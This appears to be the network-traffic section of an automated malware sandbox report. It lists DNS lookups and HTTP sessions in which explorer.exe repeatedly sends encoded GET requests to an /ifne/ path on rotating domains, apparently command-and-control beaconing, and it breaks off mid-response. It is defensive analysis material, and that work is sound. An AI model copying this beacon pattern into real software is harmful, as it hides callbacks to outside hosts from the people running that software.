                                                                Apr 12, 2021 09:14:13.361952066 CEST5451353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:13.420124054 CEST53545138.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:18.164731979 CEST6204453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:18.224169970 CEST53620448.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:26.925472975 CEST6379153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:26.977607965 CEST53637918.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:36.685627937 CEST6426753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:36.734603882 CEST53642678.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:47.035775900 CEST4944853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:47.084574938 CEST53494488.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:51.019444942 CEST6034253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:51.082734108 CEST53603428.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:58.656676054 CEST6134653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:58.705426931 CEST53613468.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:14:59.522644043 CEST5177453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:14:59.571387053 CEST53517748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:00.449234009 CEST5602353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:00.498135090 CEST53560238.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:01.624515057 CEST5838453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:01.676018953 CEST53583848.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:02.513360023 CEST6026153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:02.564770937 CEST53602618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:05.902707100 CEST5606153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:05.961872101 CEST53560618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:13.715930939 CEST5833653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:13.725260973 CEST5378153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:13.773940086 CEST53537818.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:13.837492943 CEST53583368.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:14.360378981 CEST5406453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:14.479217052 CEST53540648.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:14.744024038 CEST5281153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:14.795532942 CEST53528118.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.061153889 CEST5529953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.121375084 CEST53552998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.549830914 CEST6374553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.584927082 CEST5005553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:15.606873989 CEST53637458.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:15.656763077 CEST53500558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.181138039 CEST6137453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.238332987 CEST53613748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.486033916 CEST5033953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.559525013 CEST53503398.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:16.813932896 CEST6330753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:16.871057034 CEST53633078.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:17.352262020 CEST4969453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:17.409634113 CEST53496948.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:18.176126957 CEST5498253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:18.306803942 CEST53549828.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:19.174038887 CEST5001053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:19.234009027 CEST53500108.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:19.694837093 CEST6371853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:19.751991987 CEST53637188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:21.474874973 CEST6211653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:21.526458025 CEST53621168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:21.921116114 CEST6381653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:21.996145964 CEST53638168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:23.220796108 CEST5501453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:23.279370070 CEST53550148.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:27.423146963 CEST6220853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:27.501125097 CEST53622088.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:31.194750071 CEST5757453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:31.243542910 CEST53575748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:35.689838886 CEST5181853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:35.746881008 CEST53518188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:37.885531902 CEST5662853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:38.267961025 CEST53566288.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:43.797285080 CEST6077853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:43.857230902 CEST53607788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:50.551167011 CEST5379953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:50.614190102 CEST53537998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:55.203622103 CEST5468353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:55.255132914 CEST53546838.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:15:56.955946922 CEST5932953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:15:57.029330969 CEST53593298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:02.751091003 CEST6402153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:02.802588940 CEST53640218.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:03.548824072 CEST5612953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:03.597560883 CEST53561298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:05.676117897 CEST5817753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:05.736423969 CEST53581778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:09.494019032 CEST5070053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:09.542697906 CEST53507008.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:09.921472073 CEST5406953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:10.090064049 CEST53540698.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:15.510679007 CEST6117853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:15.687482119 CEST53611788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:21.681616068 CEST5701753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:21.877540112 CEST53570178.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:22.308478117 CEST5632753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:22.357327938 CEST53563278.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:26.963778973 CEST5024353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:27.029196978 CEST53502438.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:27.560142994 CEST6205553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:27.634377003 CEST53620558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:16:29.107760906 CEST6124953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:16:29.156697035 CEST53612498.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 12, 2021 09:15:16.486033916 CEST192.168.2.68.8.8.80x4c84Standard query (0)www.wapgoals.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.921116114 CEST192.168.2.68.8.8.80xbe3fStandard query (0)www.criticalredux.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:27.423146963 CEST192.168.2.68.8.8.80x36c9Standard query (0)www.rileysboutique.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:37.885531902 CEST192.168.2.68.8.8.80xace4Standard query (0)www.lehoachi.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:43.797285080 CEST192.168.2.68.8.8.80xdc16Standard query (0)www.stepmed.lifeA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:05.676117897 CEST192.168.2.68.8.8.80xc251Standard query (0)www.stepmed.lifeA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:09.921472073 CEST192.168.2.68.8.8.80x23ceStandard query (0)www.agenciaorange.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.510679007 CEST192.168.2.68.8.8.80x752eStandard query (0)www.technomark.xyzA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:21.681616068 CEST192.168.2.68.8.8.80x3b69Standard query (0)www.indiafoodtraveling.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.560142994 CEST192.168.2.68.8.8.80xffd4Standard query (0)www.marktheoilguy.comA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 12, 2021 09:15:16.559525013 CEST8.8.8.8192.168.2.60x4c84No error (0)www.wapgoals.comwapgoals.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:15:16.559525013 CEST8.8.8.8192.168.2.60x4c84No error (0)wapgoals.com34.102.136.180A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.996145964 CEST8.8.8.8192.168.2.60xbe3fNo error (0)www.criticalredux.comhosted.fireside.fmCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:15:21.996145964 CEST8.8.8.8192.168.2.60xbe3fNo error (0)hosted.fireside.fm45.33.51.100A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:27.501125097 CEST8.8.8.8192.168.2.60x36c9No error (0)www.rileysboutique.com74.208.236.87A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:15:38.267961025 CEST8.8.8.8192.168.2.60xace4No error (0)www.lehoachi.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:15:43.857230902 CEST8.8.8.8192.168.2.60xdc16No error (0)www.stepmed.life5.101.123.53A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:05.736423969 CEST8.8.8.8192.168.2.60xc251No error (0)www.stepmed.life5.101.123.53A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:10.090064049 CEST8.8.8.8192.168.2.60x23ceNo error (0)www.agenciaorange.netagenciaorange.netCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:10.090064049 CEST8.8.8.8192.168.2.60x23ceNo error (0)agenciaorange.net51.222.80.112A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.687482119 CEST8.8.8.8192.168.2.60x752eNo error (0)www.technomark.xyztechnomark.xyzCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:15.687482119 CEST8.8.8.8192.168.2.60x752eNo error (0)technomark.xyz174.136.25.55A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:21.877540112 CEST8.8.8.8192.168.2.60x3b69No error (0)www.indiafoodtraveling.com204.11.56.48A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.634377003 CEST8.8.8.8192.168.2.60xffd4No error (0)www.marktheoilguy.commarktheoilguy.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:16:27.634377003 CEST8.8.8.8192.168.2.60xffd4No error (0)marktheoilguy.com184.168.131.241A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.wapgoals.com
                                                                • www.criticalredux.com
                                                                • www.rileysboutique.com
                                                                • www.agenciaorange.net
                                                                • www.technomark.xyz
                                                                • www.indiafoodtraveling.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.64972634.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:16.607167006 CEST1667OUTGET /ifne/?AjR=71EtUWdYzxABpFekNdqC6lfpkzJYpQcnmhsYNVCZgcOb/UTZrYaS228nAxG5B59FDGhBRZlxww==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.wapgoals.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:16.906033039 CEST1691INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Mon, 12 Apr 2021 07:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "60733cbf-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.64973345.33.51.10080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:22.197308064 CEST2275OUTGET /ifne/?AjR=dOs+lg2asUoXBO5EZg435RwPxJJuMD/jvsmygwM2KrqI9lfFwJ6FtdZyv1m6A/DgItG0MeGBng==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.criticalredux.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:22.406625032 CEST2276INHTTP/1.1 302 Found
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 12 Apr 2021 07:15:22 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                status: 302 Found
                                                                cache-control: no-cache
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-permitted-cross-domain-policies: none
                                                                x-xss-protection: 1; mode=block
                                                                x-request-id: a007ddf2-61de-4f30-aacd-9fecf27575bf
                                                                location: https://fireside.fm/
                                                                x-download-options: noopen
                                                                x-runtime: 0.006187
                                                                x-frame-options: SAMEORIGIN
                                                                x-content-type-options: nosniff
                                                                x-content-type-options: nosniff
                                                                Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 73 69 64 65 2e 66 6d 2f 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: 56<html><body>You are being <a href="https://fireside.fm/">redirected</a>.</body></html>
                                                                Apr 12, 2021 09:15:22.406703949 CEST2276INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.64973974.208.236.8780C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:15:27.665319920 CEST6594OUTGET /ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.rileysboutique.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:15:27.830058098 CEST6595INHTTP/1.1 302 Found
                                                                Content-Type: text/html
                                                                Content-Length: 0
                                                                Connection: close
                                                                Date: Mon, 12 Apr 2021 07:15:27 GMT
                                                                Server: Apache/2.4.10 (Debian)
                                                                Cache-Control: no-cache
                                                                Location: https://rileysboutiqueshop.company.site//ifne/?AjR=zzTxArteMsObKw8PVSTAy3ItaE+XllOQAe/BMiW6EZ4sNP9JkFpsMwiszAJkxQMr59SfztPEEw==&ndndsL=-Zh4XzYxhHVda6t


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.64975351.222.80.11280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:10.229217052 CEST6712OUTGET /ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.agenciaorange.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:10.371033907 CEST6713INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:10 GMT
                                                                Server: Apache
                                                                Content-Security-Policy: upgrade-insecure-requests;
                                                                Location: https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 351
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 67 65 6e 63 69 61 6f 72 61 6e 67 65 2e 6e 65 74 2f 69 66 6e 65 2f 3f 41 6a 52 3d 38 47 6a 47 4d 39 67 48 30 4a 67 50 54 72 31 66 50 56 33 35 6d 73 73 6d 41 38 44 64 62 74 30 79 36 45 4b 6c 56 6d 34 4f 52 48 45 71 69 74 71 6c 42 61 44 42 73 4d 4b 68 75 30 6a 71 63 72 6d 78 41 4b 58 35 6b 66 47 55 41 77 3d 3d 26 61 6d 70 3b 6e 64 6e 64 73 4c 3d 2d 5a 68 34 58 7a 59 78 68 48 56 64 61 36 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.agenciaorange.net/ifne/?AjR=8GjGM9gH0JgPTr1fPV35mssmA8Ddbt0y6EKlVm4ORHEqitqlBaDBsMKhu0jqcrmxAKX5kfGUAw==&amp;ndndsL=-Zh4XzYxhHVda6t">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.649754174.136.25.5580C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:15.850569963 CEST6714OUTGET /ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.technomark.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:20.034461975 CEST6715INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:16:15 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.4.16
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://technomark.xyz/ifne/?AjR=rtUU9PmTXQaf/wGdlMxfwAVfjNGr3c9lw0dfQP58ZOH4+/gv/3vAFDrG/mXph96X+27XXnGiag==&ndndsL=-Zh4XzYxhHVda6t
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.649755204.11.56.4880C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:16:22.041131020 CEST6716OUTGET /ifne/?AjR=uTh+jOJLcZ1+A+ZwJUR1QlGf4dkpQViro8P/md11fzExOFziGJv9l1WMjbCU3sRscsfoVkwx1Q==&ndndsL=-Zh4XzYxhHVda6t HTTP/1.1
                                                                Host: www.indiafoodtraveling.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:16:22.350006104 CEST6718INHTTP/1.1 200 OK
                                                                Date: Mon, 12 Apr 2021 07:16:22 GMT
                                                                Server: Apache
                                                                Set-Cookie: vsid=918vr3657573821812533; expires=Sat, 11-Apr-2026 07:16:22 GMT; Max-Age=157680000; path=/; domain=www.indiafoodtraveling.com; HttpOnly
                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_IRV7pOc0Xm/9416N7uYXLSgtMDYU4DL2U8RHP9DMTpfL2oM/3OsPGmGbiO5yvU1LU4WYCsGVV53fEp5zRzdaiQ==
                                                                Keep-Alive: timeout=5, max=115
                                                                Connection: Keep-Alive
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                Data Raw: 35 65 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 66 6f 6f 64 74 72 61 76 65 6c 69 6e 67 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 48 70 6b 55 6b 49 30 59 30 51 78 55 57 52 6a 55 6e 56 42 56 32 38 34 61 48 42 77 63 6a 51 32 52 6d 56 6b 5a 6c 68 4e 59 55 35 59 65 45 63 79 4d 7a 56 47 5a 6d 35 52 63 46 70 78 65 55 4e 47 56 58 45 72 57 54 6c 35 4e 48 5a 52 64 32 39 45 55 32 6c 75 57 6b 77 79 61 32 52 59 61 7a 64 31 53 7a 4e 49 4e 33 4a 69 62 47 67 30 65 6b 31 6c 54 54 64 71 55 46 42 50 57 54 45 31 63 6a 46 35 53 33 70 42 55 6a 56 4c 4c 31 46 74 57 46 55 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e
                                                                Data Ascii: 5e38<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.indiafoodtraveling.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5YeEcyMzVGZm5RcFpxeUNGVXErWTl5NHZRd29EU2luWkwya2RYazd1SzNIN3JibGg0ek1lTTdqUFBPWTE1cjF5S3pBUjVLL1FtWFU9&b="+abp;document.body.
                                                                Apr 12, 2021 09:16:22.350049019 CEST6720INData Raw: 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e
                                                                Data Ascii: appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='indiafoodtraveling.com' d='entity_mapped'" /><title>Indiafoodtraveling
